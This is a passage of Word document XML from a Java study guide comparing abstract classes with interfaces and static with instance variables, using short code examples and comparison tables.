      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AD8E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539ED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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CCE2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Person(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8EBE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23EE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9443F0"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D76497">
          <v:rect id="_x0000_i1199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF3AD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Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380E5C0"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Since it can have state (instance variables), it may involve additional memory usage due to the instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAF801"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Typically has no state, so it can be lighter. However, calling interface methods might involve slight overhead because of dynamic dispatch (virtual method calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6108FE93"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AACFB">
          <v:rect id="_x0000_i1200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B40C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3229"/>
        <w:gridCol w:w="5054"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="4F4DEAE2" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D917B1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512C2F4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271E451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64536149" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B38C44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BCED26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nd state with subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58698D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cross classes with different hierarchies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="7EEC048F" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC82C5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mplementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="335B26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4AD5961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except default and static methods from Java 8).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="462445DB" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F77ED1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76CF710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0F302C6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r w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="2A180268" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7898C5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17E1F6D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inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C6A79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 (can implement multiple interfaces).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="428F340A" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76210C3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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CDFBD2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crete methods with default behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E6778B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methods from Java 8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="346D3BC6" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ACC2D8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55FAD8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base class for shared implementation and state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13440B2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need to share common behavior, but not necessarily a common implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D9AFBE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onclusion, choose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when you need to provide a base class with common functionality and shared state, and choos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when you need to define common behavior for multiple unrelated classes, especially when the classes need to implement multiple behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73127DD8" w14:textId="406FADA2"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761B7E9" w14:textId="4E1A9357" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="006B1296">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc197867281"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of static and instance variables in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="389E16B9" w14:textId="155045BA" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">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Instance Variables in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA84F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variables can be categorized into </w:t>
      </w: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and each serves a different purpose. Understanding their differences and usage is essential for writing efficient and maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C7FDB"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B685D">
          <v:rect id="_x0000_i1202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331B2E5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A90030"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72791B29"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variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a variable that belongs to the class, rather than to any specific instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13D90D"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shared among all instances of the class and can be accessed directly using the class name without creating an object of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A8397"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7E1716B6"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Static variables are stored in a special memory area called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and are initialized only once when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF42AC"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Variable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A static variable is associated with the class and is common to all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D9261"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static variables are assigned default values (e.g., null for objects, 0 for numeric types, false for boolean).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D258189"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You can access static variables using the class name or via an instance of the class, but it is recommended to use the class name for clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E726A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38C1E1B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0FD845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variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB13C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1F9FB" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499FE4D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BF0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Static variable shared among all instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D95B17"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886768" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF3E9C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45B7D4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4E324A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0101A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A9B40A" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676CE94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3F30F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B469FE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1 = new MyClass(); // count becomes 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71BD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display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982D459" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B191E4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2 = new MyClass(); // count becomes 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABF36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display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6378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ABE4F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7CC6A8"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9DDE18B"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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022420C"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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4CBB2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 Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B567B8"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Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you want to maintain a value that is shared by all instances of a class, such as a counter that tracks the number of instances created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5158C480"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Information:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the data should be tied to the class rather than any specific instance, such as configuration constants, global flags, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577475A"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1FABB4">
          <v:rect id="_x0000_i1203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF93444"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tance Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256F61D"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5D2C6F1B"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stance variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a variable that belongs to an individual instance of a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF3DF9"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object (instance) of the class has its own copy of instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E937C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430E6BBE"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Instance variables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and each object gets its own copy of the instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4841AD"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level Variable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instance variables are specific to each object created from the class. They can have different values for different instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C41AB"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instance variables are assigned default values (e.g., null for objects, 0 for numeric types, false for boolean).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77402352"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Instance variables are accessed via object references (i.e., through an instance of the class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297F7B3"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4B06720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51526F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tance variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298212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13DB86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37D82754" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A69882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String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99F04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Instance variable 'name' is unique to each object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A49E9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   // Instance variable 'age' is unique to each object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765519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F8BB70" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053BBBD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5FA2D0A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name + ", Age: " + age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B2F1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BA8D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EC266" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED47D1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Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D105B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5D46C2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1 = new Person("Alice", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31471DD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1.display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050A7FC" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014931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2 = new Person("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECD7D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2.display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21D59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0C9A0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D44ED" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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7C9F7CA"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lice, Age: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33C2FF"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Bob, Age: 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC7678"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nstance Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E9BE86"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pecific Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When each object needs to have its own copy of data, such as name, age, salary, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EE7EF"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Values for Different Objects:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When different instances of a class require different values for the same property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365479B7"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AE2CC">
          <v:rect id="_x0000_i1204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE3CAB"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665"/>
        <w:gridCol w:w="3760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="2E1FDF70" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FFA482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FAE1C49"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ariable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="558017DA"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stance Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="44171A18" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CB8BF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longs To</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76C5C9D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hared among all instances)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CDC222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unique to each object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="0C5813B5" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4550E2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4AFE37E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Method Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15B2EDC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Heap memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="0195C3AE" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29F8AD4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41BF17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by class name or object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0BC51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by object reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="68BBE9F6" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69808B1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03655AB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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6254C2A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r>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="4814E499" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C0B812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0664F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ata for all objects of the class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF7FF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pecific to individual objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="7D031BD7" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6492A9E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="698C16F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once when the class is loaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E59259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when an object is created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="70C17F4B" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B50041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47B998E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int count;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362CD3A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ge;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A3D4C38"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B6DBF">
          <v:rect id="_x0000_i1205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1D07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C65F8F"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re used for values that need to be shared by all instances of a class. They belong to the class itself and are often used for tracking things like counters or common settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CC8FE"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are used for values that are specific to each object. They belong to individual instances of the class and each object can have different values for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E585C8B" w14:textId="1EEE797C" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00342FA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F03588">
          <v:rect id="_x0000_i1206" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D550619" w14:textId="77777777" w:rsidR="00806A73" w:rsidRPr="00CE4B95" w:rsidRDefault="00806A73" w:rsidP="00342FA5">
      <w:pPr>
        <w:rPr>
